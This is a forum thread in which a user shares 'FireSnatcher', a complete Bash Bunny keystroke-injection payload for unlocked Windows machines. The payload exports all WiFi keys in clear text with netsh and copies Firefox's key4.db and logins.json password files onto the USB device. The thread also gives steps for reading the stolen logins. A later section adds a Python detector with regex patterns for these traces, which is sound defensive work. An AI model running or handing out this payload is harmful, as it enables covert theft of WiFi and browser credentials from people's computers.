KarrotKak3
Posted April 24, 2022

Greetings. This is my First Payload written for the Bash Bunny.

https://github.com/KarrotKak3/FireSnatcher.git

# Props: saintcrossbow & 0iphor13 - I used their work for examples

# Full Description
# ----------------
# Attacks an Unlocked Windows Machine
# Payload targets:
# - All WiFi creds
# - Firefox Saved Password Database
#
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC

# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds

# KNOWN ISSUES
# ---------------
# Loot is saved in Payloads/switch#/loot

CODE:

Payload.txt

# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0iphor13
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)
# Attackmodes: HID, Storage

# Full Description
# ----------------
# Attacks an Unlocked Windows Machine
# Payload targets:
# - All WiFi creds
# - Firefox Saved Password Database
#
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins

# KNOWN ISSUES
# ---------------
# Loot is saved in Payloads/switch#/loot

# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds

# Setup
# -----
# - Place the payload.txt and FireSnatcher.bat in Payload folder
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility

# LEDs
# ----
# Magenta: Initial setup – about 1 – 3 seconds
# Single yellow blink: Attack in progress
# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed

# Options
# -------
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
BB_NAME="BashBunny"

# Setup
# -----
LED SETUP

# Attack
# ------
ATTACKMODE HID STORAGE
Q DELAY 500
LED ATTACK
Q DELAY 100
Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell
Q ENTER
Q DELAY 7000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
Q ENTER
Q DELAY 8000
Q STRING EXIT
Q ENTER
sync
LED FINISH
Q DELAY 1500
shutdown now

FireSnatcher.bat

mkdir %~dp0\loot\%COMPUTERNAME%
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
C:
cd \D %appdata%\mozilla\firefox\profiles\
cd %appdata%\mozilla\firefox\profiles\*.default-release\
copy key4.db %~dp0\loot\%COMPUTERNAME%
copy logins.json %~dp0\loot\%COMPUTERNAME%

##
## Usage: Make Files Payload.txt and FireSnatcher.bat containing above code
## Copy Both files to either Payloads\{switch1 or switch2}
##
## Loot will be copied to .\payloads\{switch}\loot instead of .\loot

As Always, I am not Responsible for what you do with this payload.

KarrotKak3
KarrotKak3 (Author)
Posted April 24, 2022

HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
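
For defenders, the payload posted above leaves three observable traces on the host: netsh exporting WLAN profiles with key=clear, a PowerShell expression that looks up a volume by label and runs a file from it, and key4.db / logins.json being written outside the Firefox profile folder. The Python below is an added example, not part of the original post or the FireSnatcher repository; the event records and their field names (type, image, text) are constructed for illustration and would need mapping to whatever your endpoint telemetry actually emits.

```python
import re

# Constructed telemetry records (not real logs). The "type", "image" and
# "text" fields are assumed names for this example only.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "text": "netsh wlan export profile key=clear"},
    {"type": "process", "image": r"C:\Windows\System32\netsh.exe",
     "text": "netsh wlan show profiles"},  # benign inventory command
    {"type": "scriptblock", "image": "powershell.exe",
     "text": "iex((gwmi win32_volume -f 'label=''BashBunny''')"
             ".Name+'\\payloads\\switch1\\FireSnatcher.bat')"},
    {"type": "file", "image": r"C:\Windows\System32\cmd.exe",
     "text": r"E:\payloads\switch1\loot\HOST01\key4.db"},
    {"type": "file", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "text": r"C:\Users\a\AppData\Roaming\Mozilla\Firefox\Profiles"
             r"\x1.default-release\logins.json"},  # normal browser write
]

# Command-line / script-block rules. The volume label is configurable in the
# payload (BB_NAME), so the second rule keys on the lookup pattern instead.
RULES = {
    "wifi_key_export": ("process", re.compile(
        r"\bnetsh(\.exe)?\b.*\bwlan\b.*\bexport\b.*\bprofile\b"
        r".*\bkey\s*=\s*clear\b", re.I)),
    "exec_from_labelled_volume": ("scriptblock", re.compile(
        r"\b(iex|invoke-expression)\b.*\b(gwmi|get-wmiobject|get-ciminstance)\b"
        r".*win32_volume.*label\s*=", re.I)),
}
FIREFOX_STORE = re.compile(r"\\(key4\.db|logins\.json)$", re.I)
PROFILE_DIR = re.compile(r"\\Mozilla\\Firefox\\Profiles\\", re.I)

def detect(events):
    """Return (index, rule_name) for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        for name, (kind, pattern) in RULES.items():
            if ev["type"] == kind and pattern.search(ev["text"]):
                hits.append((i, name))
        # Credential store files created anywhere but the profile directory.
        if (ev["type"] == "file" and FIREFOX_STORE.search(ev["text"])
                and not PROFILE_DIR.search(ev["text"])):
            hits.append((i, "firefox_store_copied_out_of_profile"))
    return hits

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The `copy` steps in the batch file are cmd.exe built-ins and create no child process, which is why the Firefox rule matches on file-creation paths rather than command lines.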
This topic is now archived and is closed to further replies.